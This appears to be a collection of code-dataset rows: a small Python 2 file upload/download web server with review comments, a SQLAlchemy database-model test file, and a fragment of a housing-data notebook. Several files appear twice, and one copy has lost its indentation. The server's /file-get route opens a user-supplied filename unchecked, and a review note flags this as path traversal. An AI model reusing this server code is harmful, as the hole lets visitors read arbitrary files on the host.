    restores the OWASP-recommended entity for each character in the set.
    The duplicated membership list is folded into a single dict lookup.
    """
    js_replacements = {'&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;',
                       "'": '&#x27;', '/': '&#x2F;', '`': '&#x60;', '=': '&#x3D;'}
    sanit = ''
    for char in input:
        # Characters outside the table pass through unchanged.
        sanit += js_replacements.get(char, char)
    return sanit
def downloads_ls():
    """Return the filenames currently available in the download repository.

    Reads the directory directly; the old implementation chdir-ed into it
    and back just to call os.listdir, mutating global process state.
    """
    return os.listdir('files\\repo')
def fetch(toFetch):
    # Remember which repository file the next /file-get request should
    # stream back.  This is a module-level global shared by every request,
    # so two concurrent downloads can race on it.
    global fetchpath
    fetchpath = str(toFetch)
class WebServerHandler(BaseHTTPRequestHandler):
    # Python 2 request handler for a tiny upload/download site.
    # NOTE(review): /file-get opens the user-chosen fetchpath unchecked, so
    # a crafted filename can read files outside files\repo (path traversal)
    # -- confirm and sanitize with os.path.basename.

    def do_GET(self):
        if self.path.endswith("/upload"):
            # Upload form page.
            self.send_response(200)
            self.send_header('Content-type', 'text/html')
            self.end_headers()
            output = ""
            output += "<html><title>Submit a new file</title>"
            output += "<body>"
            output += "<h2> How's it going?</h2>"
            output += '''<form method = 'POST' enctype='multipart/form-data' action='/upload'> What file would you like to upload? </h2>
<br><input name = 'filename' type = 'text' maxlength="40"><br> <input name = 'userfile' type = 'file'><br> <input type = 'submit' value = 'Upload'></form>'''
            output += "</body></html>"
            self.wfile.write(output.encode(encoding='utf_8'))
            return
        elif self.path.endswith("/download"):
            # Listing of the repository plus a download form.
            self.send_response(200)
            self.send_header('Content-type', 'text/html')
            self.end_headers()
            ready = downloads_ls()
            print ready
            output = ""
            output += "<html><title>Download an existing file</title>"
            output += "<body>"
            output += "<h2> Choose a file:</h2>"
            for file in ready:
                output += "<p>" + str(file) + "</p>"
            output += "<form method = 'POST' enctype='multipart/form-data' action='/download'> What file would you like to download? </h2><input name = 'filename' type = 'text'> <input type = 'submit' value = 'Download'></form>"
            output += "</body></html>"
            self.wfile.write(output.encode(encoding='utf_8'))
            return
        elif self.path.endswith("/file-get"):
            # Stream the file chosen by the last /download POST (module
            # global fetchpath) as an attachment.
            os.chdir('files\\repo')
            with open(fetchpath, 'rb') as f:
                self.send_response(200)
                self.send_header("Content-Type", 'application/octet-stream')
                self.send_header("Content-Disposition", 'attachment; filename="{}"'.format(os.path.basename(fetchpath)))
                fs = os.fstat(f.fileno())
                self.send_header("Content-Length", str(fs.st_size))
                self.end_headers()
                shutil.copyfileobj(f, self.wfile)
                f.close()  # redundant: the with block already closes f
            print "Download Successful"
            os.chdir('..\\..')
            return
        else:
            # Landing page with navigation links and a visitor counter.
            self.send_response(200)
            self.send_header('Content-type', 'text/html')
            self.end_headers()
            output = ""
            output += "<html><title>Files for debate</title><body>"
            output += "<p>Welcome to this convenient site I made to upload debate files to!</p>"
            output += "<a href=upload>" + 'Submit a file to be uploaded' + "</a>"
            output += "<p><a href=download>" + 'Access files others have submitted' + "</a></p><br>"
            output += "Number of visitors: <br>"
            output += '''<a href="http://counter5nolixj34.onion/visits.php?id=a17336fc5c02f2444f699f53e6acc3cf"><img style="height:24px;width:auto;" src="http://counter5nolixj34.onion/counter.gif?id=a17336fc5c02f2444f699f53e6acc3cf&bg=000000&fg=FFFFFF&tr=0&unique=0&mode=0"></a>'''
            output += "</body></html>"
            self.wfile.write(output.encode(encoding='utf_8'))
            print "Home"
            return

    def do_POST(self):
        try:
            self.send_response(200)
            self.send_header('Content-type', 'text/html')
            self.end_headers()
            ctype, pdict = cgi.parse_header(
                self.headers.getheader('content-type'))
            if (ctype == 'multipart/form-data') and (self.path.endswith('/upload')):
                filework = True
                fields = cgi.parse_multipart(self.rfile, pdict)
                fname = fields.get('filename')
                print fname
                messagecontent = fields.get('userfile')
                # Substring blacklist: also rejects names merely containing
                # ".inf"/".exe", e.g. "x.executive.txt".
                if ('.inf' not in fname[0]) and ('.exe' not in fname[0]):
                    savefile(fname[0], messagecontent[0])
            elif (ctype == 'multipart/form-data') and (self.path.endswith('/download')):
                filework = True
                fields = cgi.parse_multipart(self.rfile, pdict)
                fname = fields.get('filename')
                print fname
                fetch(fname[0])
                # Redirect the browser to /file-get, which streams fetchpath.
                output = ""
                output += "<html><head>"
                output += '<meta http-equiv="refresh" content="0; url=/file-get" />'
                output += "</head><body>"
                output += "</body></html>"
                self.wfile.write(output.encode(encoding="utf_8"))
            # NOTE(review): filework is only bound inside the two branches
            # above; any other POST raises NameError here, which the bare
            # except below swallows silently.
            if (filework):
                print "File + return"
                output = ""
                output += "<html>"
                output += "<body><a href='/'> Home </a></p>"
                output += "</body></html>"
                self.wfile.write(output.encode(encoding="utf_8"))
        except:
            # NOTE(review): bare except hides every error in POST handling;
            # narrow this and at least log the exception.
            pass
def main():
    """Start the HTTP server on port 8000 and serve until interrupted."""
    try:
        port = 8000
        server = HTTPServer(('', port), WebServerHandler)
        # Use the port variable so the message cannot drift from the real
        # bind (the original hard-coded 8000 a second time in the string).
        print("Web Server running on port: %d" % port)
        server.serve_forever()
    except KeyboardInterrupt:
        print(" ^C entered, stopping web server....")
        server.socket.close()
if __name__ == '__main__':
main() | site.py | from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import cgi
import os
import shutil
def savefile(fname, messagecontent):
    """Persist an uploaded file's raw bytes into the files\\subs directory.

    Builds the destination path directly instead of chdir-ing in and out,
    so a failed write can no longer leave the process in the wrong working
    directory; the `with` block also makes the explicit close redundant.
    """
    # fname comes from an untrusted form field: keep only the final path
    # component so "../" sequences cannot escape the upload directory.
    safe_name = os.path.basename(fname)
    with open(os.path.join('files\\subs', safe_name), 'wb') as ufl:
        ufl.write(messagecontent)
    print("File saved!")
def escape(input):
    """Return *input* with HTML-special characters replaced by entities.

    BUG FIX: the replacement table mapped every character to itself (the
    entity strings had been lost), so nothing was actually escaped; this
    restores the OWASP-recommended entity for each character in the set.
    The duplicated membership list is folded into a single dict lookup.
    """
    js_replacements = {'&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;',
                       "'": '&#x27;', '/': '&#x2F;', '`': '&#x60;', '=': '&#x3D;'}
    sanit = ''
    for char in input:
        # Characters outside the table pass through unchanged.
        sanit += js_replacements.get(char, char)
    return sanit
def downloads_ls():
    """Return the filenames currently available in the download repository.

    Reads the directory directly; the old implementation chdir-ed into it
    and back just to call os.listdir, mutating global process state.
    """
    return os.listdir('files\\repo')
def fetch(toFetch):
    # Remember which repository file the next /file-get request should
    # stream back.  This is a module-level global shared by every request,
    # so two concurrent downloads can race on it.
    global fetchpath
    fetchpath = str(toFetch)
class WebServerHandler(BaseHTTPRequestHandler):
    # Python 2 request handler for a tiny upload/download site.
    # NOTE(review): /file-get opens the user-chosen fetchpath unchecked, so
    # a crafted filename can read files outside files\repo (path traversal)
    # -- confirm and sanitize with os.path.basename.

    def do_GET(self):
        if self.path.endswith("/upload"):
            # Upload form page.
            self.send_response(200)
            self.send_header('Content-type', 'text/html')
            self.end_headers()
            output = ""
            output += "<html><title>Submit a new file</title>"
            output += "<body>"
            output += "<h2> How's it going?</h2>"
            output += '''<form method = 'POST' enctype='multipart/form-data' action='/upload'> What file would you like to upload? </h2>
<br><input name = 'filename' type = 'text' maxlength="40"><br> <input name = 'userfile' type = 'file'><br> <input type = 'submit' value = 'Upload'></form>'''
            output += "</body></html>"
            self.wfile.write(output.encode(encoding='utf_8'))
            return
        elif self.path.endswith("/download"):
            # Listing of the repository plus a download form.
            self.send_response(200)
            self.send_header('Content-type', 'text/html')
            self.end_headers()
            ready = downloads_ls()
            print ready
            output = ""
            output += "<html><title>Download an existing file</title>"
            output += "<body>"
            output += "<h2> Choose a file:</h2>"
            for file in ready:
                output += "<p>" + str(file) + "</p>"
            output += "<form method = 'POST' enctype='multipart/form-data' action='/download'> What file would you like to download? </h2><input name = 'filename' type = 'text'> <input type = 'submit' value = 'Download'></form>"
            output += "</body></html>"
            self.wfile.write(output.encode(encoding='utf_8'))
            return
        elif self.path.endswith("/file-get"):
            # Stream the file chosen by the last /download POST (module
            # global fetchpath) as an attachment.
            os.chdir('files\\repo')
            with open(fetchpath, 'rb') as f:
                self.send_response(200)
                self.send_header("Content-Type", 'application/octet-stream')
                self.send_header("Content-Disposition", 'attachment; filename="{}"'.format(os.path.basename(fetchpath)))
                fs = os.fstat(f.fileno())
                self.send_header("Content-Length", str(fs.st_size))
                self.end_headers()
                shutil.copyfileobj(f, self.wfile)
                f.close()  # redundant: the with block already closes f
            print "Download Successful"
            os.chdir('..\\..')
            return
        else:
            # Landing page with navigation links and a visitor counter.
            self.send_response(200)
            self.send_header('Content-type', 'text/html')
            self.end_headers()
            output = ""
            output += "<html><title>Files for debate</title><body>"
            output += "<p>Welcome to this convenient site I made to upload debate files to!</p>"
            output += "<a href=upload>" + 'Submit a file to be uploaded' + "</a>"
            output += "<p><a href=download>" + 'Access files others have submitted' + "</a></p><br>"
            output += "Number of visitors: <br>"
            output += '''<a href="http://counter5nolixj34.onion/visits.php?id=a17336fc5c02f2444f699f53e6acc3cf"><img style="height:24px;width:auto;" src="http://counter5nolixj34.onion/counter.gif?id=a17336fc5c02f2444f699f53e6acc3cf&bg=000000&fg=FFFFFF&tr=0&unique=0&mode=0"></a>'''
            output += "</body></html>"
            self.wfile.write(output.encode(encoding='utf_8'))
            print "Home"
            return

    def do_POST(self):
        try:
            self.send_response(200)
            self.send_header('Content-type', 'text/html')
            self.end_headers()
            ctype, pdict = cgi.parse_header(
                self.headers.getheader('content-type'))
            if (ctype == 'multipart/form-data') and (self.path.endswith('/upload')):
                filework = True
                fields = cgi.parse_multipart(self.rfile, pdict)
                fname = fields.get('filename')
                print fname
                messagecontent = fields.get('userfile')
                # Substring blacklist: also rejects names merely containing
                # ".inf"/".exe", e.g. "x.executive.txt".
                if ('.inf' not in fname[0]) and ('.exe' not in fname[0]):
                    savefile(fname[0], messagecontent[0])
            elif (ctype == 'multipart/form-data') and (self.path.endswith('/download')):
                filework = True
                fields = cgi.parse_multipart(self.rfile, pdict)
                fname = fields.get('filename')
                print fname
                fetch(fname[0])
                # Redirect the browser to /file-get, which streams fetchpath.
                output = ""
                output += "<html><head>"
                output += '<meta http-equiv="refresh" content="0; url=/file-get" />'
                output += "</head><body>"
                output += "</body></html>"
                self.wfile.write(output.encode(encoding="utf_8"))
            # NOTE(review): filework is only bound inside the two branches
            # above; any other POST raises NameError here, which the bare
            # except below swallows silently.
            if (filework):
                print "File + return"
                output = ""
                output += "<html>"
                output += "<body><a href='/'> Home </a></p>"
                output += "</body></html>"
                self.wfile.write(output.encode(encoding="utf_8"))
        except:
            # NOTE(review): bare except hides every error in POST handling;
            # narrow this and at least log the exception.
            pass
def main():
    """Start the HTTP server on port 8000 and serve until interrupted."""
    try:
        port = 8000
        server = HTTPServer(('', port), WebServerHandler)
        # Use the port variable so the message cannot drift from the real
        # bind (the original hard-coded 8000 a second time in the string).
        print("Web Server running on port: %d" % port)
        server.serve_forever()
    except KeyboardInterrupt:
        print(" ^C entered, stopping web server....")
        server.socket.close()
if __name__ == '__main__':
main() | 0.16654 | 0.048114 |
import os
from datetime import date
from typing import Dict, Type, Optional, List
from unittest import TestCase, main
import sqlalchemy as orm
from sqlalchemy.ext.declarative import declarative_base
from dotenv import load_dotenv
from judah.destinations.database.connection import DatabaseConnection
from judah.destinations.database.config import DatabaseConnectionConfig
from judah.destinations.database.model import DatabaseBaseModel
from test.utils import create_tables_in_database, delete_tables_from_database, drop_schema
_ROOT_PATH = os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(__file__))))
load_dotenv(os.path.join(_ROOT_PATH, '.env'))
_TEST_DB_URI = os.environ.get('TEST_POSTGRES_DB_URI')
_TEST_DB_BASE = declarative_base()
_TABLE_NAME = 'dummy'
_SCHEMA_NAME = 'test_schema'
class TestModel(DatabaseBaseModel, _TEST_DB_BASE):
    """Test database model"""
    __tablename__ = _TABLE_NAME
    __table_args__: Dict = {'schema': _SCHEMA_NAME}
    # Connection settings come from the TEST_POSTGRES_DB_URI env variable.
    _db_configuration: DatabaseConnectionConfig = DatabaseConnectionConfig(db_uri=_TEST_DB_URI)
    _base_declarative_class: Type[declarative_base()] = _TEST_DB_BASE
    # "Date" is the column the get_last_record/get_last_saved_timestamp
    # helpers treat as the record timestamp.
    _datetime_fields: Optional[List[str]] = ["Date"]
    # Composite primary key: (Date, number).  Mixed-case column names are
    # deliberate -- the tests exercise case-sensitive attribute access.
    Date = orm.Column(orm.Date, primary_key=True)
    number = orm.Column(orm.Integer, primary_key=True)
    Capacity = orm.Column(orm.Integer)
    Price = orm.Column(orm.Integer)
class TestDatabaseBaseModel(TestCase):
    """Tests for the DatabaseBaseModel base class"""
    # Integration tests: every method talks to the Postgres instance named
    # by TEST_POSTGRES_DB_URI through the judah DatabaseConnection helpers.

    def setUp(self) -> None:
        """Initialize a few variables"""
        # Fixture rows.  data[1] carries the latest Date (2020-03-12); the
        # "last record"/"last timestamp" tests rely on that ordering.
        self.data = [
            {"Date": date(year=2020, month=3, day=9), "number": 1, "Capacity": 16616, "Price": 67},
            {"Date": date(year=2020, month=3, day=12), "number": 2, "Capacity": 16516, "Price": 567},
            {"Date": date(year=2020, month=3, day=10), "number": 3, "Capacity": 16616, "Price": 637},
            {"Date": date(year=2020, month=3, day=9), "number": 4, "Capacity": 16620, "Price": 617},
        ]
        try:
            delete_tables_from_database(db_configuration=TestModel._db_configuration,
                                        table_name=_TABLE_NAME, schema_name=_SCHEMA_NAME)
        except Exception:
            # The table may not exist yet on the first run; either way the
            # test starts from a clean slate.
            pass

    def load_database(self):
        """Loads the database with the self.data"""
        create_tables_in_database(db_configuration=TestModel._db_configuration,
                                  model_base=_TEST_DB_BASE, schema_name=_SCHEMA_NAME)
        with DatabaseConnection.get_db_connection(
                db_connection_config=TestModel._db_configuration) as db_connection:
            for datum in self.data:
                record = TestModel(**datum)
                db_connection.db_session.add(record)
                db_connection.db_session.commit()

    def test_get_attributes(self):
        """Should return the column names of the model"""
        self.load_database()
        column_names = TestModel.get_attributes()
        # created_at/updated_at are contributed by DatabaseBaseModel.
        expected_columns = ['Date', 'number', 'Capacity', 'Price', 'created_at', 'updated_at']
        self.assertListEqual(sorted(column_names), sorted(expected_columns))

    def test_get_last_record(self):
        """Should return the latest record according to the given datetime column"""
        self.load_database()
        last_record = TestModel.get_last_record()
        # data[1] has the greatest Date value in the fixture.
        expected_last_record = self.data[1]
        columns = ['Date', 'number', 'Capacity', 'Price']
        for column in columns:
            self.assertEqual(getattr(last_record, column), expected_last_record[column])

    def test_get_last_saved_timestamp(self):
        """Should return the timestamp of the last saved record"""
        self.load_database()
        last_timestamp = TestModel.get_last_saved_timestamp()
        expected_last_timestamp = self.data[1]['Date']
        self.assertEqual(last_timestamp, expected_last_timestamp)

    def test_update(self):
        """Should update the attributes passed in the kwargs and saves"""
        create_tables_in_database(db_configuration=TestModel._db_configuration,
                                  model_base=_TEST_DB_BASE, schema_name=_SCHEMA_NAME)
        with DatabaseConnection.get_db_connection(
                db_connection_config=TestModel._db_configuration) as db_connection:
            record = TestModel(**self.data[1])
            db_connection.db_session.add(record)
            db_connection.db_session.commit()
            new_capacity = 56
            new_price = 7
            record.update(session=db_connection.db_session, Capacity=new_capacity, Price=new_price)
            # Re-query by primary key to confirm the change was persisted.
            record_from_database = db_connection.db_session.query(TestModel).filter_by(
                Date=record.Date, number=record.number).first()
            db_connection.db_session.commit()
            self.assertEqual(record_from_database.Capacity, new_capacity)
            self.assertEqual(record_from_database.Price, new_price)

    def test_save(self):
        """Should commit any new changes to the database"""
        create_tables_in_database(db_configuration=TestModel._db_configuration,
                                  model_base=_TEST_DB_BASE, schema_name=_SCHEMA_NAME)
        with DatabaseConnection.get_db_connection(
                db_connection_config=TestModel._db_configuration) as db_connection:
            record = TestModel(**self.data[1])
            # The record is not in the session yet, so it must be absent
            # from the table before save() is called.
            record_from_database_pre_save = db_connection.db_session.query(TestModel).filter_by(
                Date=record.Date, number=record.number).first()
            db_connection.db_session.commit()
            record.save(db_connection.db_session)
            record_from_database_post_save = db_connection.db_session.query(TestModel).filter_by(
                Date=record.Date, number=record.number).first()
            db_connection.db_session.commit()
            self.assertIsNone(record_from_database_pre_save)
            self.assertIsInstance(record_from_database_post_save, TestModel)

    def test_delete(self):
        """Should delete the current record from the database"""
        create_tables_in_database(db_configuration=TestModel._db_configuration,
                                  model_base=_TEST_DB_BASE, schema_name=_SCHEMA_NAME)
        with DatabaseConnection.get_db_connection(
                db_connection_config=TestModel._db_configuration) as db_connection:
            record = TestModel(**self.data[1])
            db_connection.db_session.add(record)
            db_connection.db_session.commit()
            record_from_database_pre_deletion = db_connection.db_session.query(TestModel).filter_by(
                Date=record.Date, number=record.number).first()
            record.delete(db_connection.db_session)
            record_from_database_post_deletion = db_connection.db_session.query(TestModel).filter_by(
                Date=record.Date, number=record.number).first()
            self.assertIsNone(record_from_database_post_deletion)
            self.assertIsInstance(record_from_database_pre_deletion, TestModel)

    def test_create_schema(self):
        """Should create the schema for this class if it exists"""
        # Drop first so the creation is observable.
        drop_schema(db_configuration=TestModel._db_configuration, schema_name=_SCHEMA_NAME)
        with DatabaseConnection.get_db_connection(
                db_connection_config=TestModel._db_configuration) as db_connection:
            schema_check_sql = f"""
            SELECT exists(select schema_name FROM information_schema.schemata WHERE schema_name = '{_SCHEMA_NAME}')
            """
            self.assertFalse(db_connection.execute_sql(schema_check_sql).first()[0])
            TestModel.create_schema(db_connection.connection_engine)
            self.assertTrue(db_connection.execute_sql(schema_check_sql).first()[0])

    def test_initialize(self):
        """Should create the tables in the database"""
        drop_schema(db_configuration=TestModel._db_configuration, schema_name=_SCHEMA_NAME)
        with DatabaseConnection.get_db_connection(
                db_connection_config=TestModel._db_configuration) as db_connection:
            table_check_sql = f"""
            SELECT EXISTS (
                SELECT FROM pg_tables
                WHERE schemaname = '{_SCHEMA_NAME}'
                AND tablename = '{_TABLE_NAME}'
            )
            """
            self.assertFalse(db_connection.execute_sql(table_check_sql).first()[0])
            TestModel.initialize()
            self.assertTrue(db_connection.execute_sql(table_check_sql).first()[0])

    def test_upsert_new_record(self):
        """upsert should creates a new record if it does not exist and then return the data"""
        create_tables_in_database(db_configuration=TestModel._db_configuration,
                                  model_base=_TEST_DB_BASE, schema_name=_SCHEMA_NAME)
        with DatabaseConnection.get_db_connection(
                db_connection_config=TestModel._db_configuration) as db_connection:
            raw_data = self.data[1]
            record_from_database_pre_insert = db_connection.db_session.query(TestModel).filter_by(
                Date=raw_data['Date'], number=raw_data['number']).first()
            db_connection.db_session.commit()
            self.assertIsNone(record_from_database_pre_insert)
            recorded_data = TestModel.upsert(raw_data)
            record_from_database_post_insert = db_connection.db_session.query(TestModel).filter_by(
                Date=raw_data['Date'], number=raw_data['number']).first()
            db_connection.db_session.commit()
            self.assertDictEqual(recorded_data, raw_data)
            self.assertIsInstance(record_from_database_post_insert, TestModel)
            for field, value in raw_data.items():
                self.assertEqual(getattr(record_from_database_post_insert, field), value)

    def test_upsert_old_record(self):
        """upsert should update an existing record if it does not exist and then return the data"""
        create_tables_in_database(db_configuration=TestModel._db_configuration,
                                  model_base=_TEST_DB_BASE, schema_name=_SCHEMA_NAME)
        with DatabaseConnection.get_db_connection(
                db_connection_config=TestModel._db_configuration) as db_connection:
            raw_data = self.data[1]
            record = TestModel(**raw_data)
            db_connection.db_session.add(record)
            db_connection.db_session.commit()
            # Same primary key, different payload: upsert must update.
            new_data = {
                **raw_data,
                'Capacity': 7643,
                'Price': 211
            }
            updated_data = TestModel.upsert(new_data)
            record_from_database_post_update = db_connection.db_session.query(TestModel).filter_by(
                Date=raw_data['Date'], number=raw_data['number']).first()
            self.assertDictEqual(updated_data, new_data)
            self.assertIsInstance(record_from_database_post_update, TestModel)
            for field, value in new_data.items():
                self.assertEqual(getattr(record_from_database_post_update, field), value)

    def tearDown(self) -> None:
        # Drop the test table and release pooled connections between tests.
        try:
            delete_tables_from_database(db_configuration=TestModel._db_configuration,
                                        table_name=_TABLE_NAME, schema_name=_SCHEMA_NAME)
        except Exception:
            pass
        DatabaseConnection.close_all_connections()
        DatabaseConnection.remove_all_connections()
if __name__ == '__main__':
main() | test/test_destinations/test_database/test_model.py | import os
from datetime import date
from typing import Dict, Type, Optional, List
from unittest import TestCase, main
import sqlalchemy as orm
from sqlalchemy.ext.declarative import declarative_base
from dotenv import load_dotenv
from judah.destinations.database.connection import DatabaseConnection
from judah.destinations.database.config import DatabaseConnectionConfig
from judah.destinations.database.model import DatabaseBaseModel
from test.utils import create_tables_in_database, delete_tables_from_database, drop_schema
_ROOT_PATH = os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(__file__))))
load_dotenv(os.path.join(_ROOT_PATH, '.env'))
_TEST_DB_URI = os.environ.get('TEST_POSTGRES_DB_URI')
_TEST_DB_BASE = declarative_base()
_TABLE_NAME = 'dummy'
_SCHEMA_NAME = 'test_schema'
class TestModel(DatabaseBaseModel, _TEST_DB_BASE):
    """Test database model"""
    __tablename__ = _TABLE_NAME
    __table_args__: Dict = {'schema': _SCHEMA_NAME}
    # Connection settings come from the TEST_POSTGRES_DB_URI env variable.
    _db_configuration: DatabaseConnectionConfig = DatabaseConnectionConfig(db_uri=_TEST_DB_URI)
    _base_declarative_class: Type[declarative_base()] = _TEST_DB_BASE
    # "Date" is the column the get_last_record/get_last_saved_timestamp
    # helpers treat as the record timestamp.
    _datetime_fields: Optional[List[str]] = ["Date"]
    # Composite primary key: (Date, number).  Mixed-case column names are
    # deliberate -- the tests exercise case-sensitive attribute access.
    Date = orm.Column(orm.Date, primary_key=True)
    number = orm.Column(orm.Integer, primary_key=True)
    Capacity = orm.Column(orm.Integer)
    Price = orm.Column(orm.Integer)
class TestDatabaseBaseModel(TestCase):
"""Tests for the DatabaseBaseModel base class"""
def setUp(self) -> None:
"""Initialize a few variables"""
self.data = [
{"Date": date(year=2020, month=3, day=9), "number": 1, "Capacity": 16616, "Price": 67},
{"Date": date(year=2020, month=3, day=12), "number": 2, "Capacity": 16516, "Price": 567},
{"Date": date(year=2020, month=3, day=10), "number": 3, "Capacity": 16616, "Price": 637},
{"Date": date(year=2020, month=3, day=9), "number": 4, "Capacity": 16620, "Price": 617},
]
try:
delete_tables_from_database(db_configuration=TestModel._db_configuration,
table_name=_TABLE_NAME, schema_name=_SCHEMA_NAME)
except Exception:
pass
def load_database(self):
"""Loads the database with the self.data"""
create_tables_in_database(db_configuration=TestModel._db_configuration,
model_base=_TEST_DB_BASE, schema_name=_SCHEMA_NAME)
with DatabaseConnection.get_db_connection(
db_connection_config=TestModel._db_configuration) as db_connection:
for datum in self.data:
record = TestModel(**datum)
db_connection.db_session.add(record)
db_connection.db_session.commit()
def test_get_attributes(self):
"""Should return the column names of the model"""
self.load_database()
column_names = TestModel.get_attributes()
expected_columns = ['Date', 'number', 'Capacity', 'Price', 'created_at', 'updated_at']
self.assertListEqual(sorted(column_names), sorted(expected_columns))
def test_get_last_record(self):
"""Should return the latest record according to the given datetime column"""
self.load_database()
last_record = TestModel.get_last_record()
expected_last_record = self.data[1]
columns = ['Date', 'number', 'Capacity', 'Price']
for column in columns:
self.assertEqual(getattr(last_record, column), expected_last_record[column])
def test_get_last_saved_timestamp(self):
"""Should return the timestamp of the last saved record"""
self.load_database()
last_timestamp = TestModel.get_last_saved_timestamp()
expected_last_timestamp = self.data[1]['Date']
self.assertEqual(last_timestamp, expected_last_timestamp)
def test_update(self):
"""Should update the attributes passed in the kwargs and saves"""
create_tables_in_database(db_configuration=TestModel._db_configuration,
model_base=_TEST_DB_BASE, schema_name=_SCHEMA_NAME)
with DatabaseConnection.get_db_connection(
db_connection_config=TestModel._db_configuration) as db_connection:
record = TestModel(**self.data[1])
db_connection.db_session.add(record)
db_connection.db_session.commit()
new_capacity = 56
new_price = 7
record.update(session=db_connection.db_session, Capacity=new_capacity, Price=new_price)
record_from_database = db_connection.db_session.query(TestModel).filter_by(
Date=record.Date, number=record.number).first()
db_connection.db_session.commit()
self.assertEqual(record_from_database.Capacity, new_capacity)
self.assertEqual(record_from_database.Price, new_price)
def test_save(self):
"""Should commit any new changes to the database"""
create_tables_in_database(db_configuration=TestModel._db_configuration,
model_base=_TEST_DB_BASE, schema_name=_SCHEMA_NAME)
with DatabaseConnection.get_db_connection(
db_connection_config=TestModel._db_configuration) as db_connection:
record = TestModel(**self.data[1])
record_from_database_pre_save = db_connection.db_session.query(TestModel).filter_by(
Date=record.Date, number=record.number).first()
db_connection.db_session.commit()
record.save(db_connection.db_session)
record_from_database_post_save = db_connection.db_session.query(TestModel).filter_by(
Date=record.Date, number=record.number).first()
db_connection.db_session.commit()
self.assertIsNone(record_from_database_pre_save)
self.assertIsInstance(record_from_database_post_save, TestModel)
def test_delete(self):
"""Should delete the current record from the database"""
create_tables_in_database(db_configuration=TestModel._db_configuration,
model_base=_TEST_DB_BASE, schema_name=_SCHEMA_NAME)
with DatabaseConnection.get_db_connection(
db_connection_config=TestModel._db_configuration) as db_connection:
record = TestModel(**self.data[1])
db_connection.db_session.add(record)
db_connection.db_session.commit()
record_from_database_pre_deletion = db_connection.db_session.query(TestModel).filter_by(
Date=record.Date, number=record.number).first()
record.delete(db_connection.db_session)
record_from_database_post_deletion = db_connection.db_session.query(TestModel).filter_by(
Date=record.Date, number=record.number).first()
self.assertIsNone(record_from_database_post_deletion)
self.assertIsInstance(record_from_database_pre_deletion, TestModel)
def test_create_schema(self):
"""Should create the schema for this class if it exists"""
drop_schema(db_configuration=TestModel._db_configuration, schema_name=_SCHEMA_NAME)
with DatabaseConnection.get_db_connection(
db_connection_config=TestModel._db_configuration) as db_connection:
schema_check_sql = f"""
SELECT exists(select schema_name FROM information_schema.schemata WHERE schema_name = '{_SCHEMA_NAME}')
"""
self.assertFalse(db_connection.execute_sql(schema_check_sql).first()[0])
TestModel.create_schema(db_connection.connection_engine)
self.assertTrue(db_connection.execute_sql(schema_check_sql).first()[0])
def test_initialize(self):
"""Should create the tables in the database"""
drop_schema(db_configuration=TestModel._db_configuration, schema_name=_SCHEMA_NAME)
with DatabaseConnection.get_db_connection(
db_connection_config=TestModel._db_configuration) as db_connection:
table_check_sql = f"""
SELECT EXISTS (
SELECT FROM pg_tables
WHERE schemaname = '{_SCHEMA_NAME}'
AND tablename = '{_TABLE_NAME}'
)
"""
self.assertFalse(db_connection.execute_sql(table_check_sql).first()[0])
TestModel.initialize()
self.assertTrue(db_connection.execute_sql(table_check_sql).first()[0])
def test_upsert_new_record(self):
"""upsert should creates a new record if it does not exist and then return the data"""
create_tables_in_database(db_configuration=TestModel._db_configuration,
model_base=_TEST_DB_BASE, schema_name=_SCHEMA_NAME)
with DatabaseConnection.get_db_connection(
db_connection_config=TestModel._db_configuration) as db_connection:
raw_data = self.data[1]
record_from_database_pre_insert = db_connection.db_session.query(TestModel).filter_by(
Date=raw_data['Date'], number=raw_data['number']).first()
db_connection.db_session.commit()
self.assertIsNone(record_from_database_pre_insert)
recorded_data = TestModel.upsert(raw_data)
record_from_database_post_insert = db_connection.db_session.query(TestModel).filter_by(
Date=raw_data['Date'], number=raw_data['number']).first()
db_connection.db_session.commit()
self.assertDictEqual(recorded_data, raw_data)
self.assertIsInstance(record_from_database_post_insert, TestModel)
for field, value in raw_data.items():
self.assertEqual(getattr(record_from_database_post_insert, field), value)
def test_upsert_old_record(self):
"""upsert should update an existing record if it does not exist and then return the data"""
create_tables_in_database(db_configuration=TestModel._db_configuration,
model_base=_TEST_DB_BASE, schema_name=_SCHEMA_NAME)
with DatabaseConnection.get_db_connection(
db_connection_config=TestModel._db_configuration) as db_connection:
raw_data = self.data[1]
record = TestModel(**raw_data)
db_connection.db_session.add(record)
db_connection.db_session.commit()
new_data = {
**raw_data,
'Capacity': 7643,
'Price': 211
}
updated_data = TestModel.upsert(new_data)
record_from_database_post_update = db_connection.db_session.query(TestModel).filter_by(
Date=raw_data['Date'], number=raw_data['number']).first()
self.assertDictEqual(updated_data, new_data)
self.assertIsInstance(record_from_database_post_update, TestModel)
for field, value in new_data.items():
self.assertEqual(getattr(record_from_database_post_update, field), value)
def tearDown(self) -> None:
try:
delete_tables_from_database(db_configuration=TestModel._db_configuration,
table_name=_TABLE_NAME, schema_name=_SCHEMA_NAME)
except Exception:
pass
DatabaseConnection.close_all_connections()
DatabaseConnection.remove_all_connections()
if __name__ == '__main__':
main() | 0.71113 | 0.243389 |
import os
os.getcwd()
#%%
os.chdir("C:\\Users\\LEEMK\\Downloads\\handson-ml-master")
#%%
# 파이썬 2와 파이썬 3 지원
from __future__ import division, print_function, unicode_literals
# 공통
import numpy as np
import os
# 일관된 출력을 위해 유사난수 초기화
np.random.seed(42)
# 맷플롯립 설정
%matplotlib inline
import matplotlib
import matplotlib.pyplot as plt
plt.rcParams['axes.labelsize'] = 14
plt.rcParams['xtick.labelsize'] = 12
plt.rcParams['ytick.labelsize'] = 12
# 한글출력
matplotlib.rc('font', family='NanumBarunGothic')
plt.rcParams['axes.unicode_minus'] = False
# 그림을 저장할 폴드
PROJECT_ROOT_DIR = "."
CHAPTER_ID = "end_to_end_project"
IMAGES_PATH = os.path.join(PROJECT_ROOT_DIR, "images", CHAPTER_ID)
def save_fig(fig_id, tight_layout=True, fig_extension="png", resolution=300):
path = os.path.join(IMAGES_PATH, fig_id + "." + fig_extension)
if tight_layout:
plt.tight_layout()
plt.savefig(path, format=fig_extension, dpi=resolution)
#%%
import os
import tarfile
from six.moves import urllib
DOWNLOAD_ROOT = "https://raw.githubusercontent.com/ageron/handson-ml/master/"
HOUSING_PATH = os.path.join("datasets", "housing")
